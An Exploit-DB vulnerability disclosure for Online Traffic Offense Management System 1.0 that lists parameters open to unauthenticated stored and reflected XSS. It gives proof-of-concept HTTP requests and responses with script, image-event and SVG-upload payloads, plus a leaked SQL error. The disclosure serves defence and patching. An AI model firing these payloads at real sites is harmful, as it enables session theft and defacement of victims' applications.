Online Traffic Offense Management System 1.0 – Multiple XSS (Unauthenticated)

• Exploit Database
• 17 阅读

• 作者： snup
  日期： 2021-10-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50388/

• # Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
  # Date: 07/10/2021
  # Exploit Author: Hubert Wojciechowski
  # Contact Author: snup.php@gmail.com
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
  # Version: 1.0
  # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  
  ### XSS Stored and XSS Reflected
  
  # All requests can be sent by both an authenticated and a non-authenticated user
  
  # XSS Stored - example vulnerable pages and parameters:
  
  * The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters
  * We can upload SVG file from XSS to all places in webapp
  * We can add evil code from admin account, regular user account and unauthenticated - we needs only request
  
  * http://localhost/traffic_offense/admin/?page=user
  Parameters:
  - firstname
  - lastname
  - user image - svg file with javascript code - XSS
  
  * http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
  Parameters:
  - date_created
  - ticket_no
  - officer_id
  - officer_name
  - status
  - remarks
  - SVG file with javascript code - XSS 
  
  * All application is vulnerable
  
  # XSS Reflected - example vulnerable pages and parameters:
  
  * http://localhost/traffic_offense/admin/?page
  Parameters:
  - page
  
  * http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password
  
  * http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id
  
  * http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id
  
  * http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id
  
  -----------------------------------------------------------------------------------------------------------------------
  # POC
  -----------------------------------------------------------------------------------------------------------------------
  
  ## Example 1 - XSS Reflected
  
  # Request using POST method, payload is in the parameter value id
  
  POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: */*
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
  Content-Length: 1061
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/traffic_offense/admin/?page=user
  Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  -----------------------------21986352462593413643786432583
  Content-Disposition: form-data; name="id"
  
  13<script>alert(1)</script>37
  -----------------------------21986352462593413643786432583
  Content-Disposition: form-data; name="firstname"
  
  hacked
  [...]
  
  -----------------------------------------------------------------------------------------------------------------------
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 01:05:26 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Content-Length: 186
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  UPDATE users setfirstname = 'sdasfd',lastname = 'fdxfd',username = 'test2',`password` = 'ad0234829205b9033196ba818f7a872b'where id = 13<script>alert(1)</script>37
  
  -----------------------------------------------------------------------------------------------------------------------
  # Request using GET method, payload is in the parameter value id
  
  GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: */*
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Connection: close
  
  -----------------------------------------------------------------------------------------------------------------------
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 05:28:35 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Content-Length: 7893
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1
  SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />
  [...]
  
  -----------------------------------------------------------------------------------------------------------------------
  
  ## Example 2
  
  # XSS Stored
  
  # Save JS payload in user profile and add SVG file from vuln script
  
  POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: */*
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
  Content-Length: 4304
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/traffic_offense/admin/?page=user
  Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  -----------------------------85748650716762987124528102
  Content-Disposition: form-data; name="id"
  
  1
  -----------------------------85748650716762987124528102
  Content-Disposition: form-data; name="firstname"
  
  admin"/><img src=x onmouseover=alert(1)>
  -----------------------------85748650716762987124528102
  Content-Disposition: form-data; name="lastname"
  
  admin"/><img src=x onmouseover=alert(1)>
  -----------------------------85748650716762987124528102
  Content-Disposition: form-data; name="username"
  
  admin
  -----------------------------85748650716762987124528102
  Content-Disposition: form-data; name="password"
  
  admnin123
  -----------------------------85748650716762987124528102
  Content-Disposition: form-data; name="img"; filename="xss.svg"
  Content-Type: image/svg+xml
  
  [...]SVG PAYLOAD[...]
  
  
  -----------------------------------------------------------------------------------------------------------------------
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 05:31:29 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Content-Length: 1
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  1
  
  -----------------------------------------------------------------------------------------------------------------------
  # Request download new user data
  
  GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: close
  
  -----------------------------------------------------------------------------------------------------------------------
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 05:42:04 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 24719
  [...]
  			<div class="form-group col-6">
  					<label for="name">First Name</label>
  					<input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
  				</div>
  				<div class="form-group col-6">
  					<label for="name">Last Name</label>
  					<input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
  				</div>
  [...]
  			<div class="form-group col-6 d-flex justify-content-center">
  					<img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">
  				</div>
  [...]